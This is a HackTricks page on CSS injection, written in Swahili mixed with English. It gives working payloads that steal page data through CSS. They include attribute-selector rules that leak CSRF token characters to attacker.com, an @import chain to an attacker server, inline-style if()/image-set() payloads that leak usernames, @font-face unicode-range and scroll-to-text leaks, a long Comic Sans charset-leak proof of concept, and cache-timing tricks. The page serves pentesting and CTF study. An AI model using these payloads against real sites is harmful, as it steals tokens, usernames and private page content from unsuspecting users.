CSS Injection

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

CSS Injection

LESS Code Injection

LESS ni pre-processor maarufu wa CSS anayeeongeza variables, mixins, functions na directive yenye nguvu ya @import. Wakati wa compilation, engine ya LESS itachukua rasilimali zilizorejelewa katika taarifa za @import na kuingiza (“inline”) yaliyomo ndani yao katika CSS inayotokana wakati chaguo la (inline) linapotumika.

{{#ref}} less-code-injection.md {{/ref}}

Attribute Selector

CSS selectors zimeundwa ili kuendana na thamani za attribute za name na value za element ya input. Ikiwa attribute value ya element ya input inaanza na karakteri maalum, rasilimali ya nje iliyowekwa mapema itapakiwa:

input[name="csrf"][value^="a"] {
background-image: url(https://attacker.com/exfil/a);
}
input[name="csrf"][value^="b"] {
background-image: url(https://attacker.com/exfil/b);
}
/* ... */
input[name="csrf"][value^="9"] {
background-image: url(https://attacker.com/exfil/9);
}

Hata hivyo, njia hii inakutana na kikomo wakati inashughulika na vipengele vya input vilivofichwa (type=“hidden”) kwa sababu vipengele vilivyo fichwa havipakia background.

Kupita kwa Vipengele Vilivyo Fichwa

Ili kuepuka kizuizi hiki, unaweza kulenga kipengele jirani kinachofuata kwa kutumia ~ general sibling combinator. Sheria ya CSS kisha inatumika kwa jirani zote zinazofuata kipengele cha input kilichofichwa, na kusababisha background image kupakia:

input[name="csrf"][value^="csrF"] ~ * {
background-image: url(https://attacker.com/exfil/csrF);
}

Mfano wa vitendo wa kutumia mbinu hii umefafanuliwa kwa undani katika kipande cha msimbo kilichotolewa. Unaweza kuiangalia here.

Masharti ya CSS Injection

Ili mbinu ya CSS Injection iwe na ufanisi, masharti fulani yanapaswa kutimizwa:

1. Payload Length: CSS injection vector lazima iweze kuunga mkono payloads za urefu wa kutosha ili kuweza kupakia crafted selectors.
2. CSS Re-evaluation: Unapaswa kuwa na uwezo wa kuweka ukurasa ndani ya frame, jambo muhimu kusababisha tathmini upya ya CSS na payloads mpya zilizotengenezwa.
3. External Resources: Mbinu hii inadhani uwezo wa kutumia picha zilizohifadhiwa kwenye seva za nje. Hii inaweza kuzuiwa na Content Security Policy (CSP) ya tovuti.

Blind Attribute Selector

As explained in this post, inawezekana kuchanganya selectors :has na :not kutambua yaliyomo hata kutoka kwa blind elements. Hii ni muhimu sana unapokuwa huna wazo lolote la kile kilicho ndani ya ukurasa wa wavuti unaopakia CSS injection.
Pia inawezekana kutumia selectors hizo kutoa taarifa kutoka kwa vifungu vingi vya aina ile ile kama inavyoonyesha:

<style>
html:has(input[name^="m"]):not(input[name="mytoken"]) {
background: url(/m);
}
</style>
<input name="mytoken" value="1337" />
<input name="myname" value="gareth" />

Kuchanganya hili na mbinu ifuatayo ya @import, inawezekana exfiltrate taarifa nyingi kwa kutumia CSS injection kutoka kwa kurasa zisizoonekana kupitia blind-css-exfiltration.

@import

Mbinu ya awali ina mapungufu kadhaa; angalia mahitaji ya awali. Unahitaji kuwa unaweza ama send multiple links to the victim, au unaweza iframe the CSS injection vulnerable page.

Hata hivyo, kuna mbinu nyingine mahiri inayotumia CSS @import kuboresha ubora wa mbinu hii.

Hii ilifunuliwa mara ya kwanza na Pepe Vila na inafanya kazi hivi:

Badala ya kupakia ukurasa huo tena na tena ukiwa na mfululizo wa payloads tofauti kila mara (kama katika ile ya awali), tutapakia ukurasa mara moja tu na tu kwa kutumia import kuelekeza kwa attackers server (hii ndiyo payload ya kutuma kwa mhanga):

@import url("//attacker.com:5001/start?");

1. Import itakuwa kupokea some CSS script kutoka kwa attackers na browser ita load.
2. Sehemu ya kwanza ya CSS script ambayo attacker atatumia ni kingine @import kwa attackers server tena.
3. attackers server haitajibu request hii bado, kwa sababu tunataka leak some chars kisha itumie import hii na payload ili leak zile zinazofuata.
4. Sehemu ya pili na kubwa ya payload itakuwa attribute selector leakage payload
5. Hii itatuma kwa attackers server first char ya secret na last one
6. Mara attackers server itakapopokea first and last char ya secret, itafanya respond kwa import iliyohitajika katika hatua 2.
7. Response itakuwa sawa kabisa na steps 2, 3 and 4, lakini wakati huu itajaribu kutafuta second char ya secret kisha penultimate.

Attacker atafuata mzunguko huo hadi aweze ku leak kabisa secret.

You can find the original Pepe Vila’s code to exploit this here or you can find almost the same code but commented here.

Tip

Skripti itajaribu kugundua 2 chars kila mara (kutoka mwanzoni na kutoka mwisho) kwa sababu attribute selector inaruhusu kufanya mambo kama:

css /* value^= to match the beggining of the value*/ input[value^=“0”] { –s0: url(http://localhost:5001/leak?pre=0); }

/* value$= to match the ending of the value*/ input[value$=“f”] { –e0: url(http://localhost:5001/leak?post=f); }

Hii inaruhusu script ku leak secret haraka zaidi.

Warning

Wakati mwingine script haitambui kwa usahihi kwamba prefix + suffix zilizogunduliwa tayari ni flag kamili na itaendelea mbele (katika prefix) na nyuma (katika suffix) na kwa wakati fulani ita hang.
Usijali, angalia output kwa sababu unaweza kuona flag hapo.

Inline-Style CSS Exfiltration (attr() + if() + image-set())

Primitive hii inaruhusu exfiltration kwa kutumia tu attribute ya inline style ya element, bila selectors au external stylesheets. Inategemea CSS custom properties, func attr() ili kusoma same-element attributes, conditionals mpya za CSS if() kwa branching, na image-set() ili kusababisha network request inayoficha value iliyolingana.

Warning

Equality comparisons katika if() zinahitaji double quotes kwa string literals. Single quotes hazita match.

• Sink: control attribute ya style ya element na hakikisha target attribute iko kwenye element ile ile (attr() inasoma tu same-element attributes).
• Read: nakili attribute ndani ya CSS variable: –val: attr(title).
• Decide: chagua URL kwa kutumia nested conditionals ukilinganisha variable na string candidates: –steal: if(style(–val:“1”): url(//attacker/1); else: url(//attacker/2)).
• Exfiltrate: apply background: image-set(var(–steal)) (au property yoyote inayofanya fetch) ili kulazimisha request kwa endpoint iliyochaguliwa.

Attempt (does not work; single quotes in comparison):

<div style="--val:attr(title);--steal:if(style(--val:'1'): url(/1); else: url(/2));background:image-set(var(--steal))" title=1>test</div>

Payload inayofanya kazi (double quotes zinahitajika katika kulinganisha):

<div style='--val:attr(title);--steal:if(style(--val:"1"): url(/1); else: url(/2));background:image-set(var(--steal))' title=1>test</div>

Kuhesabu thamani za attribute zenye masharti yaliyounganishwa:

<div style='--val: attr(data-uid); --steal: if(style(--val:"1"): url(/1); else: if(style(--val:"2"): url(/2); else: if(style(--val:"3"): url(/3); else: if(style(--val:"4"): url(/4); else: if(style(--val:"5"): url(/5); else: if(style(--val:"6"): url(/6); else: if(style(--val:"7"): url(/7); else: if(style(--val:"8"): url(/8); else: if(style(--val:"9"): url(/9); else: url(/10)))))))))); background: image-set(var(--steal));' data-uid='1'></div>

Demo ya kweli (kujaribu majina ya watumiaji):

<div style='--val: attr(data-username); --steal: if(style(--val:"martin"): url(https://attacker.tld/martin); else: if(style(--val:"zak"): url(https://attacker.tld/zak); else: url(https://attacker.tld/james))); background: image-set(var(--steal));' data-username="james"></div>

Notes and limitations:

• Inafanya kazi kwenye vichunguzi vya Chromium wakati wa utafiti; tabia inaweza kutofautiana kwenye engines nyingine.
• Inafaa zaidi kwa nafasi za thamani zilizofungwa/zinazo-weza-kuhesabiwa (IDs, flags, short usernames). Kuiba mistari mirefu kwa hiari bila external stylesheets inabaki kuwa changamoto.
• Mali yoyote ya CSS ambayo inachukua URL inaweza kutumika kusababisha ombi (mfano, background/image-set, border-image, list-style, cursor, content).

Otomatiki: Burp Custom Action inaweza kuzalisha nested inline-style payloads ili brute-force attribute values: https://github.com/PortSwigger/bambdas/blob/main/CustomAction/InlineStyleAttributeStealer.bambda

Vichujio vingine

Njia nyingine za kupata sehemu za DOM kwa kutumia CSS selectors:

• .class-to-search:nth-child(2): Hii itatafuta kipengee cha pili chenye class “class-to-search” katika DOM.
• :empty selector: Imetumika kwa mfano katika this writeup:

css [role^=“img”][aria-label=“1”]:empty { background-image: url(“YOUR_SERVER_URL?1”); }

Error based XS-Search

Rejea: CSS based Attack: Abusing unicode-range of @font-face , Error-Based XS-Search PoC by @terjanq

Nia kuu ni kutumia custom font kutoka endpoint inayodhibitiwa na kuhakikisha kwamba maandishi (katika kesi hii, ‘A’) yanaonyeshwa kwa font hii tu ikiwa rasilimali iliyoainishwa (favicon.ico) haiwezi kupakuliwa.

<!DOCTYPE html>
<html>
<head>
<style>
@font-face {
font-family: poc;
src: url(http://attacker.com/?leak);
unicode-range: U+0041;
}

#poc0 {
font-family: "poc";
}
</style>
</head>
<body>
<object id="poc0" data="http://192.168.0.1/favicon.ico">A</object>
</body>
</html>

1. Matumizi ya Fonti Mahususi:

• Fonti maalum imefafanuliwa kwa kutumia kanuni ya @font-face ndani ya teg
• Fonti inaitwa poc na inachukuliwa kutoka kwenye endpoint ya nje (http://attacker.com/?leak).
• sifa unicode-range imewekwa kuwa U+0041, ikilenga alama maalum ya Unicode ‘A’.

2. Teg :

• Teg
• font-family ya teg hili imewekwa kuwa ‘poc’, kama ilivyofafanuliwa katika sehemu ya
• Ikiwa rasilimali (favicon.ico) haitafanikiwa kupakiwa, yaliyomo ya fallback (herufi ‘A’) ndani ya teg
• Yaliyomo ya fallback (‘A’) yataonyeshwa kwa kutumia fonti maalum poc ikiwa rasilimali ya nje haiwezi kupakiwa.

Mtindo wa Scroll-to-Text Fragment

Pseudo-class :target inatumika kuchagua elementi inayolengwa na URL fragment, kama ilivyobainishwa katika CSS Selectors Level 4 specification. Ni muhimu kuelewa kwamba ::target-text haisawii na elementi yoyote isipokuwa maandishi yanalengwa wazi na fragment.

Waswasi la usalama linatokea wakati washambuliaji wanapotumia kipengele cha Scroll-to-text fragment, na kuwaruhusu kuthibitisha uwepo wa maandishi maalum kwenye ukurasa wa wavuti kwa kupakia rasilimali kutoka kwa server yao kupitia HTML injection. Njia hiyo inahusisha kuingiza sheria ya CSS kama hii:

:target::before {
content: url(target.png);
}

Katika matukio kama hayo, ikiwa maandishi “Administrator” yapo kwenye ukurasa, rasilimali target.png itaombwa kutoka kwa server, ikionyesha uwepo wa maandishi hayo. Mfano wa shambulio hili unaweza kutekelezwa kupitia URL iliyotengenezwa mahsusi inayojumuisha CSS iliyotiwa pamoja na Scroll-to-text fragment:

http://127.0.0.1:8081/poc1.php?note=%3Cstyle%3E:target::before%20{%20content%20:%20url(http://attackers-domain/?confirmed_existence_of_Administrator_username)%20}%3C/style%3E#:~:text=Administrator

Hapa, shambulio linatumia HTML injection kusafirisha CSS, likilenga maandishi maalum “Administrator” kupitia Scroll-to-text fragment (#:~:text=Administrator). Ikiwa maandishi hayo yanapatikana, rasilimali iliyotajwa itapakiwa, kwa bahati mbaya ikimtangazia attacker uwepo wake.

Kwa kupunguza hatari, mambo yafuatayo yanapaswa kuzingatiwa:

1. Constrained STTF Matching: Scroll-to-text Fragment (STTF) imeundwa ili kuendana tu na maneno au sentensi, hivyo kupunguza uwezo wake wa leak siri au tokens.
2. Restriction to Top-level Browsing Contexts: STTF inafanya kazi tu katika top-level browsing contexts na haitafanya kazi ndani ya iframes, kwa hivyo jaribio lolote la exploitation litakuwa dhahiri zaidi kwa mtumiaji.
3. Necessity of User Activation: STTF inahitaji user-activation gesture ili ifanye kazi, maana exploitations zinawezekana tu kupitia navigations zilizoanzishwa na user. Mahitaji haya yanapunguza kwa kiasi kikubwa hatari ya mashambulio kufanywa kwa automation bila mwingiliano wa user. Hata hivyo, mwandishi wa blogu anaonyesha masharti maalum na njia za bypass (mfano, social engineering, mwingiliano na browser extensions maarufu) ambazo zinaweza kurahisisha automation ya shambulio.

Kujua mifumo hii na udhaifu unaoweza kutumika ni muhimu kwa kudumisha usalama wa wavuti na kujikinga dhidi ya mbinu za exploitation kama hizi.

Kwa taarifa zaidi angalia ripoti ya asili: https://www.secforce.com/blog/new-technique-of-stealing-data-using-css-and-scroll-to-text-fragment-feature/

You can check an exploit using this technique for a CTF here.

@font-face / unicode-range

Unaweza kubainisha fonti za nje kwa thamani maalum za unicode ambazo zitatapakuliwa tu ikiwa thamani hizo za unicode zipo kwenye ukurasa. Kwa mfano:

<style>
@font-face {
font-family: poc;
src: url(http://attacker.example.com/?A); /* fetched */
unicode-range: U+0041;
}
@font-face {
font-family: poc;
src: url(http://attacker.example.com/?B); /* fetched too */
unicode-range: U+0042;
}
@font-face {
font-family: poc;
src: url(http://attacker.example.com/?C); /* not fetched */
unicode-range: U+0043;
}
#sensitive-information {
font-family: poc;
}
</style>

<p id="sensitive-information">AB</p>
htm

When you access this page, Chrome and Firefox fetch “?A” and “?B” because text node of sensitive-information contains “A” and “B” characters. But Chrome and Firefox do not fetch “?C” because it does not contain “C”. This means that we have been able to read “A” and “B”.

Text node exfiltration (I): ligatures

Marejeo: Wykradanie danych w świetnym stylu – czyli jak wykorzystać CSS-y do ataków na webaplikację

Mbinu iliyofafanuliwa inahusisha kutoa maandishi kutoka kwa node kwa kutumia font ligatures na kufuatilia mabadiliko ya upana. Mchakato unajumuisha hatua kadhaa:

1. Creation of Custom Fonts:

• SVG fonts zinatengenezwa zikiwa na glyphs zilizo na sifa horiz-adv-x, ambayo inaweka upana mkubwa kwa glyph inayowakilisha mfululizo wa herufi mbili.
• Mfano wa SVG glyph: , ambapo “XY” inaashiria mfululizo wa herufi mbili.
• Fonts hizi zinaongozwa baadaye kuwa katika muundo wa woff kwa kutumia fontforge.

2. Detection of Width Changes:

• CSS inatumiwa kuhakikisha kuwa maandishi hayajizungukiwa (white-space: nowrap) na kubinafsisha mtindo wa scrollbar.
• Kuonekana kwa scrollbar ya mstatili, iliyopakwa mtindo kwa namna tofauti, hufanya kama kiashirio (oracle) kwamba ligature maalum, na kwa hivyo mfululizo maalum wa herufi, upo katika maandishi.
• The CSS involved: css body { white-space: nowrap; } body::-webkit-scrollbar { background: blue; } body::-webkit-scrollbar:horizontal { background: url(http://attacker.com/?leak); }

3. Exploit Process:

• Step 1: Fonts zinaundwa kwa jozi za herufi zenye upana mkubwa.
• Step 2: Njia ya kutumia scrollbar hutumika kugundua wakati glyph yenye upana mkubwa (ligature kwa jozi ya herufi) inachorwa, ikionyesha uwepo wa mfululizo wa herufi.
• Step 3: Kufuatia kugundua ligature, glyph mpya zinazoonyesha mfululizo wa herufi tatu zinaundwa, zikijumuisha jozi iliyogunduliwa na kuongezwa kwa herufi inayotangulia au inayofuata.
• Step 4: Kugundua ligature ya herufi tatu kunafanywa.
• Step 5: Mchakato unarudiwa, kwa taratibu ukifichua kila sehemu ya maandishi.

4. Optimization:

• Njia ya sasa ya kuanzishaji inayotumia si ya ufanisi.
• Njia bora zaidi inaweza kuwa ni kutumia trick ya CSS @import, kuboresha utendaji wa exploit.

Text node exfiltration (II): leaking the charset with a default font (not requiring external assets)

Marejeo: PoC using Comic Sans by @Cgvwzq & @Terjanq

Trick hii ilitolewa katika hii Slackers thread. Charset inayotumika katika text node inaweza kufichuliwa ukitumia default fonts zilizowekwa katika browser: hakuna fonts za nje au za custom zinazohitajika.

Dhana inahusu kutumia animation kuongeza upana wa div kwa hatua, kuruhusu herufi moja kwa wakati kuhamia kutoka sehemu ya ‘suffix’ ya maandishi hadi sehemu ya ‘prefix’. Mchakato huu unagawanya maandishi katika sehemu mbili:

1. Prefix: Mwisho wa mstari wa mwanzo.
2. Suffix: Mstari(au mistari) inayofuata.

Hatua za mabadiliko za herufi zitaonekana kama ifuatavyo:

C
ADB

CA
DB

CAD
B

CADB

Wakati wa mabadiliko haya, trick ya unicode-range inatumika kutambua kila herufi mpya inapojumuishwa katika prefix. Hii inafikiwa kwa kubadili font hadi Comic Sans, ambayo ni ndefu zaidi kuliko font ya default, hivyo kusababisha scrollbar ya wima. Kuonekana kwa scrollbar hii kwa njia isiyo moja kwa moja kunaonyesha kuwepo kwa herufi mpya katika prefix.

Ingawa mbinu hii inaruhusu kugundua herufi za kipekee zinapoonekana, haifafanui ni herufi gani imejirudia, ila ni kwamba kurudiwa kumetokea.

Tip

Kwa msingi, unicode-range inatumika kugundua char, lakini kwa kuwa hatutaki kupakia font ya nje, tunahitaji njia nyingine.
Wakati char inapopatikana, inapewa font ya pre-installed Comic Sans, ambayo inafanya char kuwa kubwa na kuanzisha scroll bar ambayo italeak char iliyopatikana.

Check the code extracted from the PoC:

/* comic sans is high (lol) and causes a vertical overflow */
@font-face {
font-family: has_A;
src: local("Comic Sans MS");
unicode-range: U+41;
font-style: monospace;
}
@font-face {
font-family: has_B;
src: local("Comic Sans MS");
unicode-range: U+42;
font-style: monospace;
}
@font-face {
font-family: has_C;
src: local("Comic Sans MS");
unicode-range: U+43;
font-style: monospace;
}
@font-face {
font-family: has_D;
src: local("Comic Sans MS");
unicode-range: U+44;
font-style: monospace;
}
@font-face {
font-family: has_E;
src: local("Comic Sans MS");
unicode-range: U+45;
font-style: monospace;
}
@font-face {
font-family: has_F;
src: local("Comic Sans MS");
unicode-range: U+46;
font-style: monospace;
}
@font-face {
font-family: has_G;
src: local("Comic Sans MS");
unicode-range: U+47;
font-style: monospace;
}
@font-face {
font-family: has_H;
src: local("Comic Sans MS");
unicode-range: U+48;
font-style: monospace;
}
@font-face {
font-family: has_I;
src: local("Comic Sans MS");
unicode-range: U+49;
font-style: monospace;
}
@font-face {
font-family: has_J;
src: local("Comic Sans MS");
unicode-range: U+4a;
font-style: monospace;
}
@font-face {
font-family: has_K;
src: local("Comic Sans MS");
unicode-range: U+4b;
font-style: monospace;
}
@font-face {
font-family: has_L;
src: local("Comic Sans MS");
unicode-range: U+4c;
font-style: monospace;
}
@font-face {
font-family: has_M;
src: local("Comic Sans MS");
unicode-range: U+4d;
font-style: monospace;
}
@font-face {
font-family: has_N;
src: local("Comic Sans MS");
unicode-range: U+4e;
font-style: monospace;
}
@font-face {
font-family: has_O;
src: local("Comic Sans MS");
unicode-range: U+4f;
font-style: monospace;
}
@font-face {
font-family: has_P;
src: local("Comic Sans MS");
unicode-range: U+50;
font-style: monospace;
}
@font-face {
font-family: has_Q;
src: local("Comic Sans MS");
unicode-range: U+51;
font-style: monospace;
}
@font-face {
font-family: has_R;
src: local("Comic Sans MS");
unicode-range: U+52;
font-style: monospace;
}
@font-face {
font-family: has_S;
src: local("Comic Sans MS");
unicode-range: U+53;
font-style: monospace;
}
@font-face {
font-family: has_T;
src: local("Comic Sans MS");
unicode-range: U+54;
font-style: monospace;
}
@font-face {
font-family: has_U;
src: local("Comic Sans MS");
unicode-range: U+55;
font-style: monospace;
}
@font-face {
font-family: has_V;
src: local("Comic Sans MS");
unicode-range: U+56;
font-style: monospace;
}
@font-face {
font-family: has_W;
src: local("Comic Sans MS");
unicode-range: U+57;
font-style: monospace;
}
@font-face {
font-family: has_X;
src: local("Comic Sans MS");
unicode-range: U+58;
font-style: monospace;
}
@font-face {
font-family: has_Y;
src: local("Comic Sans MS");
unicode-range: U+59;
font-style: monospace;
}
@font-face {
font-family: has_Z;
src: local("Comic Sans MS");
unicode-range: U+5a;
font-style: monospace;
}
@font-face {
font-family: has_0;
src: local("Comic Sans MS");
unicode-range: U+30;
font-style: monospace;
}
@font-face {
font-family: has_1;
src: local("Comic Sans MS");
unicode-range: U+31;
font-style: monospace;
}
@font-face {
font-family: has_2;
src: local("Comic Sans MS");
unicode-range: U+32;
font-style: monospace;
}
@font-face {
font-family: has_3;
src: local("Comic Sans MS");
unicode-range: U+33;
font-style: monospace;
}
@font-face {
font-family: has_4;
src: local("Comic Sans MS");
unicode-range: U+34;
font-style: monospace;
}
@font-face {
font-family: has_5;
src: local("Comic Sans MS");
unicode-range: U+35;
font-style: monospace;
}
@font-face {
font-family: has_6;
src: local("Comic Sans MS");
unicode-range: U+36;
font-style: monospace;
}
@font-face {
font-family: has_7;
src: local("Comic Sans MS");
unicode-range: U+37;
font-style: monospace;
}
@font-face {
font-family: has_8;
src: local("Comic Sans MS");
unicode-range: U+38;
font-style: monospace;
}
@font-face {
font-family: has_9;
src: local("Comic Sans MS");
unicode-range: U+39;
font-style: monospace;
}
@font-face {
font-family: rest;
src: local("Courier New");
font-style: monospace;
unicode-range: U+0-10FFFF;
}

div.leak {
overflow-y: auto; /* leak channel */
overflow-x: hidden; /* remove false positives */
height: 40px; /* comic sans capitals exceed this height */
font-size: 0px; /* make suffix invisible */
letter-spacing: 0px; /* separation */
word-break: break-all; /* small width split words in lines */
font-family: rest; /* default */
background: grey; /* default */
width: 0px; /* initial value */
animation: loop step-end 200s 0s, trychar step-end 2s 0s; /* animations: trychar duration must be 1/100th of loop duration */
animation-iteration-count: 1, infinite; /* single width iteration, repeat trychar one per width increase (or infinite) */
}

div.leak::first-line {
font-size: 30px; /* prefix is visible in first line */
text-transform: uppercase; /* only capital letters leak */
}

/* iterate over all chars */
@keyframes trychar {
0% {
font-family: rest;
} /* delay for width change */
5% {
font-family: has_A, rest;
--leak: url(?a);
}
6% {
font-family: rest;
}
10% {
font-family: has_B, rest;
--leak: url(?b);
}
11% {
font-family: rest;
}
15% {
font-family: has_C, rest;
--leak: url(?c);
}
16% {
font-family: rest;
}
20% {
font-family: has_D, rest;
--leak: url(?d);
}
21% {
font-family: rest;
}
25% {
font-family: has_E, rest;
--leak: url(?e);
}
26% {
font-family: rest;
}
30% {
font-family: has_F, rest;
--leak: url(?f);
}
31% {
font-family: rest;
}
35% {
font-family: has_G, rest;
--leak: url(?g);
}
36% {
font-family: rest;
}
40% {
font-family: has_H, rest;
--leak: url(?h);
}
41% {
font-family: rest;
}
45% {
font-family: has_I, rest;
--leak: url(?i);
}
46% {
font-family: rest;
}
50% {
font-family: has_J, rest;
--leak: url(?j);
}
51% {
font-family: rest;
}
55% {
font-family: has_K, rest;
--leak: url(?k);
}
56% {
font-family: rest;
}
60% {
font-family: has_L, rest;
--leak: url(?l);
}
61% {
font-family: rest;
}
65% {
font-family: has_M, rest;
--leak: url(?m);
}
66% {
font-family: rest;
}
70% {
font-family: has_N, rest;
--leak: url(?n);
}
71% {
font-family: rest;
}
75% {
font-family: has_O, rest;
--leak: url(?o);
}
76% {
font-family: rest;
}
80% {
font-family: has_P, rest;
--leak: url(?p);
}
81% {
font-family: rest;
}
85% {
font-family: has_Q, rest;
--leak: url(?q);
}
86% {
font-family: rest;
}
90% {
font-family: has_R, rest;
--leak: url(?r);
}
91% {
font-family: rest;
}
95% {
font-family: has_S, rest;
--leak: url(?s);
}
96% {
font-family: rest;
}
}

/* increase width char by char, i.e. add new char to prefix */
@keyframes loop {
0% {
width: 0px;
}
1% {
width: 20px;
}
2% {
width: 40px;
}
3% {
width: 60px;
}
4% {
width: 80px;
}
4% {
width: 100px;
}
5% {
width: 120px;
}
6% {
width: 140px;
}
7% {
width: 0px;
}
}

div::-webkit-scrollbar {
background: blue;
}

/* side-channel */
div::-webkit-scrollbar:vertical {
background: blue var(--leak);
}

Text node exfiltration (III): leaking the charset kwa kutumia default font kwa kuficha elements (not requiring external assets)

Reference: Hii imetajwa kama an unsuccessful solution in this writeup

Case hii ni sawa sana na ile iliyopita, lakini hapa lengo la kufanya chars kuwa kubwa kuliko wengine ili kuficha kitu ni kama kuzuia button isipibonyezwe na bot au kuficha image ambayo haitapakuliwa. Kwa hivyo tunaweza kupima hatua (au ukosefu wa hatua) na kujua kama char maalum ipo ndani ya text.

Text node exfiltration (III): leaking the charset kwa cache timing (not requiring external assets)

Reference: Hii imetajwa kama an unsuccessful solution in this writeup

Katika kesi hii, tunaweza kujaribu leak iwapo char iko katika text kwa ku-load fake font kutoka same origin:

@font-face {
font-family: "A1";
src: url(/static/bootstrap.min.css?q=1);
unicode-range: U+0041;
}

Ikiwa kuna mechi, the font will be loaded from /static/bootstrap.min.css?q=1. Ingawa haitapakia kwa mafanikio, the browser should cache it, na hata kama hakuna cache, kuna 304 not modified mechanism, hivyo the response should be faster kuliko mambo mengine.

Hata hivyo, ikiwa tofauti ya muda kati ya response iliyoko kwenye cache na ile isiyo kwenye cache haiko kubwa vya kutosha, hii haitakuwa ya msaada. Kwa mfano, mwandishi alitaja: However, after testing, I found that the first problem is that the speed is not much different, and the second problem is that the bot uses the disk-cache-size=1 flag, which is really thoughtful.

Text node exfiltration (III): leaking the charset by timing loading hundreds of local “fonts” (not requiring external assets)

Marejeo: Hii imetajwa kama an unsuccessful solution in this writeup

Kwenye kesi hii unaweza kuonyesha CSS to load hundreds of fake fonts kutoka asili hiyo hiyo wakati mechi inapotokea. Kwa njia hii unaweza measure the time inachukua na kubaini ikiwa char inaonekana au la kwa kitu kama:

@font-face {
font-family: "A1";
src: url(/static/bootstrap.min.css?q=1), url(/static/bootstrap.min.css?q=2),
.... url(/static/bootstrap.min.css?q=500);
unicode-range: U+0041;
}

Na msimbo wa bot unaonekana hivi:

browser.get(url)
WebDriverWait(browser, 30).until(lambda r: r.execute_script('return document.readyState') == 'complete')
time.sleep(30)

Hivyo, ikiwa font haifanani, muda wa majibu unapotembelea bot unatarajiwa kuwa takriban sekunde 30. Hata hivyo, ikiwa kuna mechi ya font, maombi mengi yatawatumwa kupata font, na kusababisha shughuli endelevu ya mtandao. Kwa hiyo, itachukua muda mrefu kumaliza vigezo vya kusitisha na kupokea jibu. Kwa hivyo, muda wa jibu unaweza kutumika kama kiashiria kuamua ikiwa kuna mechi ya font.

Marejeo

• https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e
• https://d0nut.medium.com/better-exfiltration-via-html-injection-31c72a2dae8b
• https://infosecwriteups.com/exfiltration-via-css-injection-4e999f63097d
• https://x-c3ll.github.io/posts/CSS-Injection-Primitives/
• Inline Style Exfiltration: leaking data with chained CSS conditionals (PortSwigger)
• InlineStyleAttributeStealer.bambda (Burp Custom Action)
• PoC page for inline-style exfiltration
• MDN: CSS if() conditional
• MDN: CSS attr() function
• MDN: image-set()

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.